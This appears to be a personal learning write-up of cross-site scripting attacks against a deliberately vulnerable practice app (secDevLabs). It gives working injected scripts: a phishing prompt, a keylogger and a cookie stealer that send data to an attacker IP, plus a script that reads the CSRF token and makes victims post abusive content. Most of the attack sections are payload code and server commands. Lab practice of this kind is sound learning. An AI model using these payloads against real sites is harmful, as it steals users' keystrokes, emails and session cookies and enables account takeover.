XSS Vulnerability
What is XSS?
Cross-site scripting (XSS) is a web security vulnerability that allows us to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow us to masquerade as a victim user, to carry out any actions that the user can perform, and to access any of the user's data. If the victim user has privileged access within the application, then we might be able to gain full control over all of the application's functionality and data.
Installing and Preparing labs
I use secDevLabs to practice with this vulnerability.
git clone https://github.com/globocom/secDevLabs
cd secDevLabs/owasp-top10-2021-apps/a3/gossip-world/
make install
Open the web using http://localhost:10007.
Attacking
Understanding
Verifying XSS Vulnerability
We could verify if the website interprets scripts and injects code.
Getting Email Address
Setting up the HTTP server on the attacker's device.
sudo python3 -m http.server 80
Script to be injected.
<script>
var email = prompt("Please, enter your email address to view the post", "example@example.com");
if (email == null || email == "") {
alert("Please, enter a valid email.");
}
else {
fetch("http://192.168.200.128/?email=" + email)
}
</script>
Key Logger
Setting up HTTP server on attacker device and pipe in real-time pressed keys.
sudo python3 -m http.server 80 2>&1 | sed -n '/GET \// { s/%20/ /g; p }'
Script to be injected.
<script>
var k = "";
document.onkeypress = function(e) {
e = e || window.event;
k += e.key;
var i = new Image();
i.src = "http://192.168.200.128/" + k;
};
</script>
Host server pipe output.
Redirecting to Insecure Web
Script to inject.
<script>
window.location.href = "https://cxnsxle.hashnode.dev";
</script>
Using External Scripts
We should inject script code so the web connects with us to do anything that we want (replace SCRIPT from ATTACKER with your script name).
<script src="http://192.168.200.128/<SCRIPT from ATTACKER>.js"></script>
Cookie Hijacking
We have 2 users logged on 2 different web browsers Brave and Firefox.
cxnsxle user cookie: eyJfY3NyZl90b2tlbiI6Ijc0YjhlYTQ0LTVhMmYtNDAyMy1hMTk4LTk0NWMxZDcxMzM5YiIsInVzZXJuYW1lIjoidGVzdCJ9.ZJzUIg.-qn7ZpitV7hgfPEvWMlkw6VzOuY
test user cookie: eyJfY3NyZl90b2tlbiI6ImJiNjk4N2I2LTdiNmEtNDlmYi1hZjllLWY3OTcyMjIyOWRhMiIsInVzZXJuYW1lIjoiY3huc3hsZSJ9.ZJzR-Q.OQaDB3GJqlhJYXNcTexRZvzgI5g
Disable HttpOnly on test user.
Script cookieHijacking.js to hijack the cookie of test user.
var request = new XMLHttpRequest();
request.open('GET', 'http://192.168.200.128/?cookie=' + document.cookie);
request.send();
Create a HTTP server to retrieve connections from test user.
sudo python3 -m http.server 80
Then, from the test browser, he should click on the post with the malicious code.
And finally, you can use test cookie to do anything that he cans.
Being Evil
We are going to do that for any one user, that sees a malicious post on the web, he will create a post with impolite content.
Let's start creating the malicious code into the malicious post by using cxnsxle user.
Then, we are intercepting the data sent when we create a new post by using BurpSuite.
This uses a POST method.
Now, we are going to create a malicious script so test user cans create a new impolite post.
var domain = "http://localhost:10007/newgossip" var req1 = new XMLHttpRequest(); req1.open('GET', domain, false); // false -> Syn (waits for response), true -> Asyn (doesn't wait for response) req1.withCredentials = true; req1.send(); var response = req1.responseText; var parser = new DOMParser(); var doc = parser.parseFromString(response, 'text/html'); var token = doc.getElementsByName('_csrf_token')[0].value; var req2 = new XMLHttpRequest(); var title_txt = 'MY%20BOSS%20IN%20AN%20IDIOT'; var subtitle_txt = 'BOSS%20YOU%20ARE%20AN%20ASSHOLE'; var text_txt = 'My%20boss%20has%20not%20paid%20me%20two%20months%20ago%20and%20he%20is%20an%20asshole%20with%20me'; var post_data = 'title=' + title_txt + '&subtitle=' + subtitle_txt + '&text=' + text_txt + '&_csrf_token=' + token; req2.open('POST', domain, false); // false -> Syn (waits for response), true -> Asyn (doesn't wait for response) req2.withCredentials = true; req2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); req2.send(post_data);Finally, when the test user sees the malicious post, he will create an impolite post about his payment.
I appreciate your time reading this write-up 😁 and I hope it has been valuable for your understanding of the topic, remember that this content does not come 100% from me. Writing this article is a way to reinforce my learning obtained from S4vitar's Hack4u courses 🔥.
